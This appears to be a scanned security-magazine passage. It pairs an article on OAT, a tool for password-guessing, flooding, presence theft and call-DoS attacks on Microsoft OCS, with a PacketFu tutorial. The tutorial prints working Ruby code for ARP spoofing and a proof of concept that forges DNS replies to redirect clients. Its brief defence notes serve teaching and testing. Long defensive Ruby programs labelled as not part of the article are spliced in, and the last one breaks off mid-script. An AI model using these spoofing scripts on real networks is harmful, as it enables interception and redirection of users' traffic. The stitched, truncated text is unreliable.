Well, researchers tried to apply all documented VoIP attacks - eavesdropping, protocol flooding using the PROTOS suite, call hijack attacks, call teardown along with media manipulation attacks - against OCS, but their attempts failed, as Microsoft entered the UC market with solid preparation and groundwork: 

- SIP protocol stack stands up well against fuzzing 
- Properly guarded with NTLM and Kerberos authentication 
- Use of proprietary media codecs helped Microsoft against some 
- Use of signatures in every transported SIP message helped them to avoid message tampering 
- On top of that it runs over TLS. 

Figure 2. Office Communication Server - Manifold Roles of OCS 

Figure 3. OAT Splash Screen 

Figure 4. OAT at External Network Attack Mode 

Pretty foolproof! Huh? When I started analyzing OCS, I found out there was not even a single tool available for assessing an MS OCS server. It instigated me to delve into this, and I initiated taking a look at Microsoft OCS security. I attempted to reverse engineer the OCS client and came up with my own stripped down version of the OCS Communicator client, way before the release of the UC SDK. 

I wrote a small proof of concept (PoC) using the Win32 API to authenticate a legitimate OCS user with the OCS server without using the Microsoft Communicator client. After a while, I decided to write a tool that would in effect implement some attacks against Microsoft OCS, to test the security posture of its configuration. 

Figure 5. OAT: Inside Out 

Figure 6. OAT at Internal Network Attack Mode 

Living in the information security age, there is no substitute for innovation. The initial research that went into the study of OCS resulted in the birth of this outstanding and first of its kind security assessment tool - OAT. OAT stands for OCS Assessment Tool. 

OAT is designed to check Microsoft Office Communication Server users' password strength. After a password is compromised, OAT demonstrates potential UC attacks that can be performed by legitimate users if proper security controls are not in place. 

OAT has been developed to help security 
practitioners evaluate the security architecture 
of their OCS deployments and ensure that 
their mission-critical communications and 
systems are protected. 

Currently, OAT is in its second release phase. OAT v1.0 was released and presented at VoiceCon 2009 in Orlando. OAT has a rich feature set of Online Dictionary Attacks, Presence Stealing, Contact List Stealing, IM Flood, Call Walk, Audio Spam and basic reporting. 

Think bigger and act smarter is what inspired me to move ahead. Taking this idea a step further, OAT v2.0 was officially released and presented at FRHACK 01, with improved and much awaited added features like Call DoS, targeted IM and Call Walk, and both NTLM and Kerberos authentication support over both TCP and TLS transport. 

OAT works with both Office 
Communication Server R1 and R2. 

Let's explore more about the typical usage of OAT while conducting security assessments in various network deployments. Internal network (shown in Figure 6) is a deployment scenario where OCS users have unfiltered network connectivity to the OCS server and domain controller. In this typical network scenario, OAT allows you to launch attacks like: 1) Online Dictionary Attack, 2) Domain User Enumeration, 3) Presence Stealing, 4) Contact List Stealing, 5) Domain IM Flood, 6) Domain Call Walk, 7) Call DoS. 
External Network (shown in Figure 5) is a deployment scenario where OCS users have to connect through the Edge server. This connection is usually over TLS and users do not have access to the domain controller unless they are connected via VPN. In this typical network scenario, OAT allows us to launch all previously cited attacks like Online Dictionary Attack, Contact List Stealing, Presence Stealing, IM Flood, Call Walk and Call DoS. 

The main difference between Internal and External deployment usage is that OAT can attack all available UC users when used from the Internal network, while it is limited to users from the contact list when used from an External network. 

Figure 4 shows the OAT graphical user interface (GUI); the various tab pages are responsible for the various features supported by OAT. Security professionals can use all tabs when using OAT in an Internal network assessment, while in an external network assessment scenario all tabs other than the Internal N/w Attacks tab can be used. 

Before starting an attack, the attacker should know at least one legitimate SIP URI from the OCS deployment and the OCS server's fully qualified domain name (FQDN). 

This information is not that hard to find. Any user having access to Wireshark can get these details. OAT has a Common Attack Settings tab page responsible for the most common settings required for all the UC attacks. Settings specific to the attacks are provided on the respective attack tab page. 

Let's first configure OAT by setting up the Common Attack Settings tab. We all know how much havoc a weak password can cause. Weak passwords can also lead to compromise of the entire network. OAT is designed to test the password strength of OCS users. 

A security professional can launch 
OAT and try the password strength test 
against the known SIP URI. Once the 
dictionary attack is successful, OAT opens 
up the door to simulate malicious proof of 
concept attacks against OCS users. 

This attack works because OCS does not have a policy of limiting registration attempts, and this attack can also be used as a registration flood when launched against many users from different systems. As the OCS server gets busy servicing false registration attempts, legitimate users may experience a denial of service (DoS) on registrations. 

Once the attacker has successfully compromised a legitimate user account, he is free to launch other UC attacks. 

Let's consider OAT running from an Internal deployment and enumerate all SIP users from the domain controller. Just click on the Fetch Users button to fetch all OCS enabled users from Active Directory. Once an attacker has a list of all OCS enabled users, he can target a specific user or the whole list as victims for attacks. 



Figure 7. OAT Splash Screen 



Figure 8. Successful Dictionary Attack 



Let's choose the IM Flood attack, with a Message Count of 50 and the custom message BOMB In Building...RUN!!, and launch the attack by pressing the Start Attack button. OAT will flood all the selected users with the IM message BOMB In Building...RUN!!. This message could be anything from a malicious phishing URL to a Viagra commercial. 

Some hard phones like Polycom reboot after such attacks. OAT allows you to send custom IM messages which can be used for phishing attacks if proper security measures are not in place. Users might click on the malicious URLs thinking they are coming from a legitimate user and can fall prey to such attacks. 

Figure 9. OAT IM Flooding attack from Internal Network Tab 

As we have seen, the main difference in an external network is that users do not have access to the domain controller, and hence OAT cannot enumerate OCS enabled users from an outside network. However, OAT can steal the contact list of legitimate users and launch targeted attacks against those users. 

Let's click on Get Contact button to 
fetch a contact list. Once the contact list is 
populated, choose the target users for a 
call walk from adjacent list. 

OAT steals presence information of selected target users before launching the actual attack. As OCS does not support Offline IM or missed call alerts, knowledge of target users' presence helps OAT to improve the attack timeline, and hence presence stealing is an important feature of OAT. 

Just click on the Start Attack button to launch a Call Walk attack against selected users. Call Walk is an attack where the attacker makes a call by walking through the sequence of registered users. OAT makes calls to all selected users one after another and leaves the media flow open, unless specified with media to play, once the target has picked up the call. 

OAT can read wma files and insert 
their content as media once the call is 
answered. If a wma file is specified, it gets 
played as soon as the receiver picks up 
the call made by OAT. This attack can 
be used as audio SPAM of commercials 
or to annoy users. Call DoS is a new 
feature added in OAT v2.0 and produces 
dire results in both internal and 
external deployment scenarios. OAT floods 
target users with multiple calls which they 
can't entertain, thereby knocking target 
users off the OCS server. 

This attack works for both hard and 
soft phones. The only way for the 
Communicator client to recover from 
this attack is to wait until OAT terminates 
the established call sessions. The OCS server does 
not terminate idle calls, and also does not 
keep track of ongoing call sessions for a 
particular user, which is what allows this attack to work. 



Figure 11. OAT Enumerating SIP Users 
Figure 10. A Glance at IM Flood Attack Window 

Figure 12. OAT Performs Call Walk Attack 
It's practically impossible for a single user to 
answer 30 simultaneous calls. OCS should 
not route more than 2-3 calls to any user if 
he is already in a call session. 

One of the main features of any security 
assessment tool is proper report generation. 
With the Report Generation feature, OAT is a 
complete security assessment tool. 

OAT generates nice reports of the 
launched attack sessions with detailed 
information like the settings used for the attack, 
the attack details and the respective results. 
These reports are handy for a security auditor 
and can be part of a penetration testing final 
report. OAT reports can be saved in different 
formats including PDF, MS Word DOC file 
format, RTF and text. I am still exploring and 
analyzing new areas of MS OCS server 
like the Group Chat server and A/V server. 

During my research in OCS, I 
observed a minute yet significant security 
flaw in OCS signature generation. And 
it's worth mentioning that disastrous DoS, 
presence manipulation and conference 
hijack attacks against the OCS server have 
been discovered. Currently, I am in the 
process of automating these attacks and 
building them into the next version of OAT. 

Conclusion 

Since VoIP stands as another application 
over the Internet, there is a need to secure it 
by periodically conducting VoIP security 
assessments. There's no such thing as a 
bulletproof VoIP implementation, but there 
are a handful of fundamental steps, like the use 
of TLS and SRTP and the implementation of VoIP 
best practices, which can be taken today 
to ensure that your system, or the systems 
that you're planning, will be highly secure. 

Figure 13. Call Walk Indicative Message 

Figure 14. Apparent Result of CallDoS 

Figure 15. OAT: Report generation 

The objective of OAT is to help identify 
vulnerabilities in the configuration and 
deployment of Microsoft OCS. 
This tool is all about improving 
security; it's not a hacking tool to 
expose vulnerabilities that can't be 
protected against. 

All of the security issues uncovered by 
the tool can be mitigated by following 
Microsoft recommended security best 
practices. 



Both OAT v1.0 and OAT v2.0 can be 
downloaded freely from the official website 
- http://voat.sf.net. The installation guide, 
along with detailed usage examples and 
screenshots, is available on the official OAT 
website. 

Please feel free to review the tool 
and respond back with suggestions and 
improvements. I will try my best to implement 
the feasible ones in later releases. 
Sipera VIPER (Voice over IP Exploit Research) Lab. He is 
a graduate of the University of Pune, India and author of 
the OAT (http://voat.sf.net), VideoJak (http://videojak.sf.net) and 
XTest (http://xtest.sf.net) VoIP assessment tools. 
He has spoken at information security conferences like 
ClubHack, FRHack 01 and SingCERT and can be reached 
at Abhijeet@viperlab.net 
Difficulty 

WHAT YOU WILL LEARN... 

How to craft packets in Ruby 

WHAT SHOULD YOU KNOW... 

Basics in programming 

Manipulating The Network with PacketFu 



PacketFu is a mid-level packet manipulation library written in 
Ruby. The purpose of PacketFu is to make it easier for people 
to craft and manipulate network packets in Ruby. 



The PacketFu project was started in August 
2008 by Tod Beardsley from BreakingPoint 
Systems. The reason for this project was 
that there wasn't any easy-to-use packet crafting 
and manipulation library for Ruby. PacketFu was 
built on top of the PcapRub library. 

PacketFu is currently included as a library 
inside the Metasploit pentesting framework, which 
is extremely useful if you are planning to 
code custom networking-related modules in 
Metasploit. 

The best way to use PacketFu is to run it in 
Ubuntu or to download a copy of BackTrack 4. The 
next thing you should do is to check out the latest 
SVN release of PacketFu (see Figure 1). 



To learn about the format of network 
packets you can read the Request for Comments (RFC), 
or, if you are more of a practical type of person, you 
could run Wireshark alongside some 
Linux commands/tools to generate the network 
packets and capture/analyze the packets in Wireshark 
(that is, if the protocol is supported in Wireshark). 

For example, to understand what comprises 
a DNS request/response packet, you could 
run nslookup and capture the request/response 
packet with Wireshark by listening passively on a 
wireless network interface (see Table 1). 

Let's look at how an ARP spoof packet looks 
in Wireshark. 



ARP Spoofing with 
PacketFu 

In this exercise, we are going to learn 
how to create Address Resolution 
Protocol (ARP) spoofing packets and 
also create Domain Name System 
(DNS) spoofing packets with PacketFu. 
ARP spoofing allows you to perform 
a man-in-the-middle (MITM) attack on 
the target. Effectively, it is sending an ARP 
packet to the target telling the target 
that your host computer is the gateway 
instead of the real gateway. 



Figure 1. Checking out the SVN source for PacketFu: 

$ svn checkout http://packetfu.googlecode.com/svn/trunk packetfu-readonly 

Figure 2. Fields that incoming DNS responses are checked for (Wireshark: User Datagram Protocol, Src Port / Dst Port: domain (53); Domain Name System (query): Flags: 0x0100 (standard query), Questions: 1) 
Under the Ethernet section of the ARP 
packet, you will find 3 fields (Destination, 
Source and Type). 

I have specified the Destination MAC 
address to be FF:FF:FF:FF:FF:FF, 
which is the broadcast address of the 
network. That means that all computers 
in the network will receive this ARP packet. 
Change this to the MAC address of the 
target computer if you want to be more 
specific. 

The source address would be that 
of the gateway and the type would be 
0x0806 in order for it to be classified as 
an ARP packet. 

The next few fields in the Address 
Resolution Protocol (ARP) section are pretty 
standard with the exception of the Opcode. 
You must specify a value of 0x0002 
for it to be an ARP reply instead of an ARP 
request packet. You would create an ARP 
request packet (0x0001) if you would like 
to know the MAC address of a certain 
IP address in the network. Let's now dive 
into the coding portion of this exercise. 
The table shows the relevant attributes 
that we need to specify in PacketFu when 
defining the packet (see Table 2). 

Defending Against ARP 
Spoofing In Your Network 

It is possible to protect the users in 
your network against ARP spoofing by 
enabling port security on the switch. Port 
security makes it possible to ensure 
that there is only one MAC address 
behind each port of the switch. Some 
switches also allow you to disable the 
port and/or alert you about the issue 
via the Simple Network Management 
Protocol (SNMP). 
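As an added example that is not part of the article or of PacketFu, here is a plain-Ruby monitor that parses raw Ethernet II/ARP frames laid out as in Table 1 and raises an alert when an ARP reply (opcode 0x0002) claims a protected IP, such as the gateway, with a MAC address other than the one on record. The gateway address comes from Table 1; the host and rogue MAC addresses and the frames themselves are constructed samples, and a deployment would feed the monitor frames captured from a switch mirror port or a host on the segment.

```ruby
# Added example (not from the article or PacketFu): detect spoofed ARP replies
# by parsing raw Ethernet II + ARP frames laid out as in Table 1.
ETH_TYPE_ARP   = 0x0806
ARP_OP_REQUEST = 0x0001
ARP_OP_REPLY   = 0x0002

def mac_to_s(bytes)
  bytes.unpack('C6').map { |b| format('%02x', b) }.join(':')
end

def ip_to_s(bytes)
  bytes.unpack('C4').join('.')
end

# Parse one frame; returns a hash of the Table 1 fields, or nil if the frame
# is not a well-formed Ethernet/IPv4 ARP packet.
def parse_arp(frame)
  return nil if frame.bytesize < 42
  eth_dst, eth_src, eth_type = frame.byteslice(0, 14).unpack('a6a6n')
  return nil unless eth_type == ETH_TYPE_ARP
  htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa =
    frame.byteslice(14, 28).unpack('nnCCna6a4a6a4')
  return nil unless htype == 1 && ptype == 0x0800 && hlen == 6 && plen == 4
  { eth_dst: mac_to_s(eth_dst), eth_src: mac_to_s(eth_src), opcode: opcode,
    sender_mac: mac_to_s(sha), sender_ip: ip_to_s(spa),
    target_mac: mac_to_s(tha), target_ip: ip_to_s(tpa) }
end

# Watches ARP replies for protected IPs (e.g. the gateway) and records an
# alert when the advertised sender MAC differs from the one on record.
class ArpMonitor
  attr_reader :alerts

  def initialize(known)                 # known: { ip => expected MAC }
    @known  = known.each_with_object({}) { |(ip, mac), h| h[ip] = mac.downcase }
    @alerts = []
  end

  # Returns the alert string for a suspicious reply, nil otherwise.
  def observe(frame)
    arp = parse_arp(frame)
    return nil if arp.nil? || arp[:opcode] != ARP_OP_REPLY
    expected = @known[arp[:sender_ip]]
    return nil if expected.nil? || expected == arp[:sender_mac]
    alert = "ARP reply claims #{arp[:sender_ip]} is at #{arp[:sender_mac]} " \
            "(expected #{expected}); frame #{arp[:eth_src]} -> #{arp[:eth_dst]}"
    @alerts << alert
    alert
  end
end

# Build a raw frame from the Table 1 fields (used here only to construct samples).
def build_arp_frame(eth_dst, eth_src, opcode, sender_mac, sender_ip, target_mac, target_ip)
  mac = ->(s) { s.split(':').map { |h| h.to_i(16) }.pack('C6') }
  ip  = ->(s) { s.split('.').map(&:to_i).pack('C4') }
  [mac[eth_dst], mac[eth_src], ETH_TYPE_ARP].pack('a6a6n') +
    [1, 0x0800, 6, 4, opcode, mac[sender_mac], ip[sender_ip],
     mac[target_mac], ip[target_ip]].pack('nnCCna6a4a6a4')
end

# Constructed samples: the gateway of Table 1, a genuine reply, a reply shaped
# like the one Table 3 produces (broadcast, target IP 0.0.0.0), and a request.
GATEWAY_IP  = '10.7.3.1'
GATEWAY_MAC = '11:22:33:44:55:66'
HOST_MAC    = '00:11:22:33:44:55'
ROGUE_MAC   = 'de:ad:be:ef:00:01'

LEGIT_REPLY   = build_arp_frame(HOST_MAC, GATEWAY_MAC, ARP_OP_REPLY,
                                GATEWAY_MAC, GATEWAY_IP, HOST_MAC, '10.7.3.20')
SPOOFED_REPLY = build_arp_frame('ff:ff:ff:ff:ff:ff', ROGUE_MAC, ARP_OP_REPLY,
                                ROGUE_MAC, GATEWAY_IP, 'ff:ff:ff:ff:ff:ff', '0.0.0.0')
WHO_HAS       = build_arp_frame('ff:ff:ff:ff:ff:ff', HOST_MAC, ARP_OP_REQUEST,
                                HOST_MAC, '10.7.3.20', '00:00:00:00:00:00', GATEWAY_IP)

if __FILE__ == $0
  monitor = ArpMonitor.new(GATEWAY_IP => GATEWAY_MAC)
  [LEGIT_REPLY, SPOOFED_REPLY, WHO_HAS].each do |frame|
    alert = monitor.observe(frame)
    puts alert if alert
  end
end
```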

Spoof DNS Replies to Client 
Hosts with PacketFu 

In the next exercise, we will learn 
how to write your own DNS spoofing 
script with PacketFu. 

How do you work around this port 
security feature to attack the target user? 
One method is to use DNS spoofing. 

When the target sends out a DNS 
lookup request to the DNS server, the 
first DNS response packet received 
matching the same transaction ID and 
source port will be accepted by the 
target machine. That's basically the only 
check that the client does. You do not 
need to spoof the sender IP address / 
Ethernet address in your DNS response 
packet (see Figure 2). 



With PacketFu it is currently not possible to 
bind to an interface that has no IP address. 
A chat with the author mentions that 
this might change in future. A current 
workaround that I am using is to use two 



Table 1. Fields of ARP Packet as shown in Wireshark 

Ethernet II 
  Destination:          Broadcast (ff:ff:ff:ff:ff:ff) 
  Source:               11:22:33:44:55:66 (11:22:33:44:55:66) 
  Type:                 ARP (0x0806) 

Address Resolution Protocol 
  Hardware Type:        Ethernet (0x0001) 
  Protocol Type:        IP (0x0800) 
  Hardware Size:        6 
  Protocol Size:        4 
  Opcode:               Reply (0x0002) 
  Sender MAC Address:   11:22:33:44:55:66 (11:22:33:44:55:66) 
  Sender IP Address:    10.7.3.1 (10.7.3.1) 
  Target MAC Address:   Broadcast (FF:FF:FF:FF:FF:FF) 
  Target IP Address:    0.0.0.0 


Table 2. Matching between ARP packet fields and attributes in PacketFu 

Packet Structure as shown in Wireshark                     Attributes as used in PacketFu 
Destination: Broadcast (FF:FF:FF:FF:FF:FF)                 eth_daddr 
Source: 11:22:33:44:55:66                                  eth_saddr 
Type: ARP (0x0806) 

Hardware Type: Ethernet (0x0001) 
Protocol Type: IP (0x0800) 
Hardware Size: 6 
Protocol Size: 4 
Opcode: Reply (0x0002)                                     arp_opcode 
Sender MAC Address: 11:22:33:44:55:66 (11:22:33:44:55:66)  arp_saddr_mac 
Sender IP Address: 10.7.3.1 (10.7.3.1)                     arp_saddr_ip 
Target MAC Address: Broadcast (FF:FF:FF:FF:FF:FF)          arp_daddr_mac 
Target IP Address: 0.0.0.0                                 arp_daddr_ip 



Table 3. Source code for ARP Spoofing 

Line  Code 
1     #!/usr/bin/env ruby 
2     require 'packetfu' 
3     $ipcfg = PacketFu::Utils.whoami?(:iface => 'eth0') 
4     puts "ARP spoofing the network..." 
5     arp_pkt = PacketFu::ARPPacket.new(:flavor => "Windows") 
6     arp_pkt.eth_saddr = "00:00:00:00:00:00" 
7     arp_pkt.eth_daddr = "FF:FF:FF:FF:FF:FF" 
8     arp_pkt.arp_saddr_mac = $ipcfg[:eth_saddr] 
9     arp_pkt.arp_daddr_mac = "FF:FF:FF:FF:FF:FF" 
10    arp_pkt.arp_saddr_ip = '192.168.1.1' 
11    arp_pkt.arp_daddr_ip = "0.0.0.0" 
12    arp_pkt.arp_opcode = 2 
13    caught = false 
14    while caught == false do 
15      arp_pkt.to_w('eth0') 
16    end 
Figure 3. POC source code for client DNS spoofing 

Figure 4. The payload in DNS query packet (Wireshark: Domain Name System (query); Transaction ID: 0x9777; Flags: 0x0100 (standard query); Questions: 1; Answer RRs: 0; Authority RRs: 0; Additional RRs: 0; Queries: yahoo.com: type A, class IN) 

Figure 5. The transaction ID of DNS query packet in hexadecimal 



wireless network cards: one in monitor 
mode and another in managed mode. 
The traffic is redirected from the monitor 
interface mon0 to at0 using airtun-ng. An 
IP address is set on the at0 interface. The 
script is then bound to the at0 interface to 
capture packets. 

There are two functions which I will 
explain in the POC code shown below. 

The first function, sniffDNSPacket(), 
will parse each packet sniffed at the 
network interface. 

The second function, 
generateSpoofPacket(), will be called 
when it detects a DNS request packet. 

Parsing Packets with 
PacketFu 

Let's look at how to perform packet 
parsing in PacketFu. 

The code below specifies the network 
interface to listen on. For the current version 
of PacketFu, the network interface must 
be bound to an IP address. If not, it will not 
work. We have specified the options below 
to start the capture process and to save 
the packets captured at the interface (see 
Figure 3). 

A filter is set to only capture packets 
that match the criteria udp and port 53. 
If you have used Wireshark before, this 
capture filter should be familiar to you. 

pkt_array = PacketFu::Capture.new(:iface => 'wlan0', :start => true, :filter => 'udp and port 53', :save => true) 

Next, we iterate through each packet 
in the network packet stream captured 
at the interface. It checks to see if the 
packet is empty. If the packet is not 
empty, we convert the character string 
representation of the packet back into a 
PacketFu packet. 

caught = false 
while caught == false do 
  pkt_array.stream.each do |p| 
    if PacketFu::Packet.has_data? 
      pkt = PacketFu::Packet.parse(p) 

As shown in the Wireshark screenshot 
below, we have identified the data 
portion (payload) of the DNS query. The 
data portion is also known as the payload 
in PacketFu (see Figure 4). 

In the screen below, I have highlighted 
the transaction ID; this information is 
stored in the first 2 bytes of the payload. In 
order to identify whether it's a DNS query, the next 
variable would contain the information we 
need, \x01\x00 (see Figure 5). 

In the code below, we extract the 3rd 
and 4th bytes of the payload. Since the 
bytes are represented as hexadecimal 
values, we convert them with base=16. For a 
standard query (flags 0x0100) this yields 
the string '10'. 

$dnsCount = pkt.payload[2].to_s(base=16) + pkt.payload[3].to_s(base=16) 



Table 4. Explains the source code listed in Table 3 



The domain name query starts at the 13th 
byte of the payload. The 13th byte specifies 
the length of the first label, that is, the 
part of the domain name before the dot com. 
The dot in front of the com is represented by 
a \x03 (the length of the com label). The end of the 
domain name string is terminated by a 
\x00. 

The next 2 bytes refer to the type of 
the query. You can use the table below for 
reference. You will need to convert it to hex 
values (Table 5). 

In the code below, the script reads 
each byte of the payload from the 13th byte 
until it hits a \x00, at which point it terminates. We 
convert the hex value of the domain name 
back into ASCII characters using the 
.hex.chr function (see Figure 8). 

In the code below, we check to see 
if the next 2 bytes in the payload after 
the terminator \x00 of the domain name 
contain a value of 1. If they do, we call 
our function generateDNSResponse() to 
send out a spoofed DNS packet (see Figures 
9, 10). 

Generating Spoofed DNS 
Response 

Next, we will move on to the 
generateDNSResponse() function. 

If you are converting a character 
stream to binary, you will need to use the 
pack('c*') function. The c represents 
a character and * means convert 
everything in the array from character to 
binary. 



Line     Explanation 

Line 2   Imports the packetfu library. 

Line 3   PacketFu::Utils.whoami?(:iface => 'eth0') is a useful function which 
         allows you to get information about your network interface (e.g. MAC/IP 
         address). All information about the network interface is stored in the 
         hash $ipcfg[]. 

Line 5   Defines an ARP packet with "Windows" flavor. You can replace it with 
         "Linux" too. 

Line 8   Source Ethernet MAC address (if you want to spoof it as packets sent 
         from the gateway, change it to the MAC address of the gateway). Extracts 
         the host MAC address information from the hash $ipcfg[]. Other hash 
         values accessible from $ipcfg[] are :eth_src, :ip_saddr, :ip_src, 
         :eth_dst and :eth_daddr. 

Line 9   Destination MAC address (enter the MAC address of the target computer; 
         enter ff:ff:ff:ff:ff:ff if you want to target any computer in the 
         network). 

Line 10  ARP packet source IP address. 

Line 11  ARP packet destination IP address. 

Line 12  Specifies the Opcode of the ARP packet. Opcode 1 means ARP Request; 
         Opcode 2 means ARP Response. 

Line 15  Using an infinite loop, ARP spoof packets are sent to the eth0 interface. 



Table 5. Table showing the list of DNS lookups 

Type    Value   Description 
A       1       IP Address 
NS      2       Name Server 
CNAME   5       Alias of a domain name 
PTR     12      Reverse DNS Lookup using the IP Address 
HINFO   13      Host Information 
MX      15      MX Record 
AXFR    252     Request for Zone Transfer 
ANY     255     Request for All Records 



Figure 6. The domain name queried in DNS lookup as shown in the payload (Wireshark: Queries: yahoo.com: type A, class IN; Name: yahoo.com) 

Figure 7. The type of DNS lookup. Type A refers to IP Address (Wireshark: Type: A (Host address); Class: IN (0x0001)) 
Further Resources 

PacketFu Google Code Site: http://code.google.com/p/packetfu/ 

Tod Beardsley's Blog: http://www.planb-security.net/ 

BackTrack 4 download link: http://www.remote-exploit.org/backtrack_download.html 

Metasploit Framework: http://www.metasploit.com/ 



$domainName = "" 
if $dnsCount == '10' 
  g = 13 
  while g < 100 
    if pkt.payload[g].to_s(base=16).hex.chr == "\003" 
      $domainName += "." 
    elsif pkt.payload[g].to_s(base=16).hex.chr == "\000" 
      break 
    else 
      $domainName += pkt.payload[g].to_s(base=16).hex.chr 
    end 
    g += 1 
  end 

Figure 8. Code checks to see if it's a DNS query packet and extracts the domain name 
queried 



# Inject packet if DNS A record lookup 
# (g is left pointing at the terminating \x00; the query type is the two bytes after it) 
if pkt.payload[g+2].to_s(base=16) == "1" 
  transID1 = pkt.payload[0].to_s(base=16) 
  transID2 = pkt.payload[1].to_s(base=16) 
  generateDNSResponse($domainName, transID1, transID2, pkt.eth_saddr.to_s, pkt.ip_saddr, pkt.udp_src) 
end 

Figure 9. Code that parses the DNS query packet and injects a response if the DNS query 
type is A 



Figure 10. Type of DNS query is expressed in this portion of the payload (Wireshark: Queries: yahoo.com: type A, class IN; Name: yahoo.com; Type: A (Host address); Class: IN (0x0001)) 

def generateDNSResponse(domainName, transID1, transID2, eth_saddr, ip_saddr, udp_src) 
  domainName1 = domainName.split(".") 
  domainName2 = domainName1[0] + "\x03" + domainName1[1] + "\x00" 
  domainNameLen = domainName1[0].length 
  domainNameLen = [domainNameLen].pack('c*') 

  yourIPAddress1 = $yourIPAddress.split('.') 
  yourIPAddressHex = [yourIPAddress1[0].to_i, yourIPAddress1[1].to_i, yourIPAddress1[2].to_i].pack('c*') 
  yourIPAddressHex += [yourIPAddress1[3].to_i].pack('c*') 

  transID = transID1.hex.chr + transID2.hex.chr 
  udp_pkt = PacketFu::UDPPacket.new 
  udp_pkt.eth_saddr = $ipcfg[:eth_saddr] 
  udp_pkt.eth_daddr = eth_saddr 
  udp_pkt.udp_src = 53 
  udp_pkt.udp_dst = udp_src.to_i 
  udp_pkt.ip_saddr = $ipcfg[:ip_saddr] 
  udp_pkt.ip_daddr = ip_saddr 

  # DNS header: transaction ID, flags 0x8180 (standard response), 1 question, 1 answer, 0 authority, 0 additional 
  udp_pkt.payload = transID + "\x81\x80" + "\x00\x01" + "\x00\x01" + "\x00\x00" + "\x00\x00" + domainNameLen + domainName2 
  # Question type/class (A, IN), then the answer: name pointer \xc0\x0c, type A, class IN, TTL, RDLENGTH 4, address 
  # (the four TTL bytes are illegible in the scan; \x00\x00\x1c\x20 is assumed here) 
  udp_pkt.payload += "\x00\x01" + "\x00\x01" + "\xc0\x0c\x00\x01\x00\x01\x00\x00\x1c\x20\x00\x04" + yourIPAddressHex 
  udp_pkt.recalc 
  udp_pkt.to_w('wlan0') 
end 

Figure 11. xxxxxxxx 



Figure 12. The transaction ID (Wireshark: Domain Name System (query); Transaction ID: 0x9777) 



In the early part of the script, 
$yourIPAddress is replaced with the fake 
IP address of the domain you want the 
client to be directed to. 

The function .recalc recalculates all 
fields for all headers in the packet and 
generates the packet. 

The function .to_w writes the packet 
to the interface, wlan0 in this example (see 
Figure 11). 

The transaction ID is represented 
in 2 bytes of hexadecimal values (e.g. 
01ff). In order to write the values \x01\xff 
directly inside the payload of the DNS 
response, you need to pass the values 
through the function .hex.chr. 

That is basically how the POC script 
works. 

Defending Against Client 
DNS Spoofing Attack 

So how do you defend against this type of 
client DNS spoofing attack? DNS Security 
Extensions (DNSSEC) add origin authentication and 
integrity protection. This makes it possible for the client to 
verify DNS responses. 

DNSSEC is currently supported 
in Windows Server 2008 R2 (server 
and client) and Windows 7 (client). For 
more information on using DNSSEC in a 
Windows environment, check out http://technet.microsoft.com/en-us/library/ee649277%28WS.10%29.aspx. 
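As an added example (not code from the article or from PacketFu), the following plain-Ruby script parses a DNS message the way the text walks through it (transaction ID in the first two bytes, length-prefixed labels terminated by \x00, the query type from Table 5, and the \xc0\x0c name pointer the POC response uses) and applies the two checks the text says a client makes, transaction ID and destination port; it goes one step further and flags a second answer for the same query that names a different address, which is the on-the-wire symptom of the spoof described above. The transaction ID 0x9777 and name yahoo.com come from the figures; the client port, addresses and messages are constructed samples.

```ruby
# Added example, not code from the article or from PacketFu: a plain-Ruby DNS
# message parser plus a watcher that applies the resolver-side checks the text
# describes. Ports, IDs, names and addresses below are constructed samples.
QTYPES = { 1 => 'A', 2 => 'NS', 5 => 'CNAME', 12 => 'PTR', 13 => 'HINFO',
           15 => 'MX', 252 => 'AXFR', 255 => 'ANY' }   # Table 5

# Read a length-prefixed name at +off+: labels end with \x00; a byte with the
# top two bits set is a compression pointer (the \xc0\x0c of the POC response).
def read_name(msg, off)
  labels = []
  loop do
    len = msg.getbyte(off)
    raise 'truncated name' if len.nil?
    if len == 0
      off += 1
      break
    elsif (len & 0xC0) == 0xC0
      labels << read_name(msg, ((len & 0x3F) << 8) | msg.getbyte(off + 1)).first
      off += 2
      break
    end
    labels << msg.byteslice(off + 1, len)
    off += 1 + len
  end
  [labels.join('.'), off]
end

# Parse header, questions and answers; A records are decoded to dotted quads.
def parse_dns(payload)
  id, flags, qd, an, _ns, _ar = payload.unpack('n6')
  off = 12                                    # the question starts at the 13th byte
  questions = Array.new(qd) do
    name, off = read_name(payload, off)
    qtype, qclass = payload.byteslice(off, 4).unpack('nn')
    off += 4
    { name: name, qtype: QTYPES.fetch(qtype, qtype), qclass: qclass }
  end
  answers = Array.new(an) do
    name, off = read_name(payload, off)
    rtype, _rclass, ttl, rdlen = payload.byteslice(off, 10).unpack('nnNn')
    rdata = payload.byteslice(off + 10, rdlen)
    off += 10 + rdlen
    rdata = rdata.unpack('C4').join('.') if rtype == 1 && rdlen == 4
    { name: name, rtype: QTYPES.fetch(rtype, rtype), ttl: ttl, rdata: rdata }
  end
  { id: id, response: (flags & 0x8000) != 0, questions: questions, answers: answers }
end

# Tracks queries by (client port, transaction ID), the only two things the text
# says a client matches on, and flags a later answer that disagrees with the
# first one accepted for the same query: the wire-level symptom of a spoof.
class DnsSpoofWatcher
  attr_reader :alerts

  def initialize
    @pending = {}   # [client port, txid] => queried name
    @first_a = {}   # [client port, txid] => first A record accepted
    @alerts  = []
  end

  def on_query(client_port, payload)
    m = parse_dns(payload)
    return :ignored if m[:response] || m[:questions].empty?
    @pending[[client_port, m[:id]]] = m[:questions].first[:name]
    :tracked
  end

  def on_response(client_port, payload)
    m = parse_dns(payload)
    key = [client_port, m[:id]]
    return :unsolicited unless m[:response] && @pending.key?(key)
    a = m[:answers].find { |r| r[:rtype] == 'A' }
    return :accepted if a.nil?
    seen = @first_a[key]
    if seen.nil?
      @first_a[key] = a[:rdata]
      return :accepted
    end
    return :duplicate if seen == a[:rdata]
    @alerts << format('conflicting A answers for %s (txid 0x%04x, port %d): %s then %s',
                      @pending[key], m[:id], client_port, seen, a[:rdata])
    :conflict
  end
end

# Build a constructed sample message: a query when answer_ip is nil, otherwise
# a response with one A record whose name is a \xc0\x0c pointer to the question.
def build_dns(id, name, answer_ip = nil, ttl = 300)
  qname = name.split('.').map { |l| [l.bytesize].pack('C') + l }.join + "\x00"
  msg = [id, answer_ip ? 0x8180 : 0x0100, 1, answer_ip ? 1 : 0, 0, 0].pack('n6') + qname + [1, 1].pack('nn')
  return msg unless answer_ip
  msg + "\xC0\x0C".b + [1, 1, ttl, 4].pack('nnNn') + answer_ip.split('.').map(&:to_i).pack('C4')
end

if __FILE__ == $0
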